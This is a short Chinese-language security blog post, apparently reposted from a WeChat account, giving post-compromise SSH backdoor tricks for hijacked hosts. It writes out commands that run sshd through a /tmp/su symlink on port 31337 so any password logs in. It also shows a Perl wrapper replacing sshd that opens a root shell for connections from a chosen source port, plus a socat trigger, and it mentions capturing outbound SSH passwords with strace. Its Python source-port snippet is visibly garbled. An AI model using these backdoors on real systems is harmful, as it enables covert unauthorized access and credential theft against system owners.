SSH渗透技巧

  • A+
所属分类:安全文章

入侵得到SHELL后,对方防火墙没限制,想快速开放一个可以访问的SSH端口肉鸡上执行
[email protected]:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337;
就会派生一个31337端口,然后连接31337,用root/bin/ftp/mail当用户名,密码随意,就可登陆。
效果图:

SSH渗透技巧


做一个SSH wrapper后门,效果比第一个好,没有开放额外的端口,只要对方开了SSH服务,就能远程连接在肉鸡上执行:
[[email protected] ~]# cd /usr/sbin

[[email protected] sbin]# mv sshd ../bin

[[email protected] sbin]# echo '#!/usr/bin/perl' >sshd

{[email protected] sbin]# echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd

[[email protected] sbin]# echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd

[[email protected] sbin]# chmod u+x sshd

[[email protected] sbin]# /etc/init.d/sshd restart在本机执行:
socat STDIO TCP4:10.18.180.20:22,sourceport=13377如果你想修改源端口,可以用python的struct标准库实现
>>> import struct>>> buffer = struct.pack('>I6',19526)>>> print repr(buffer)'x00x00LF'>>> buffer = struct.pack('>I6',13377)>>> print buffer4A记录SSH客户端连接密码搞定主机后,往往想记录肉鸡SSH连接到其他主机的密码,进一步扩大战果,使用strace命令就行了。
效果图:

SSH渗透技巧


本文始发于微信公众号(飓风网络安全):SSH渗透技巧

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: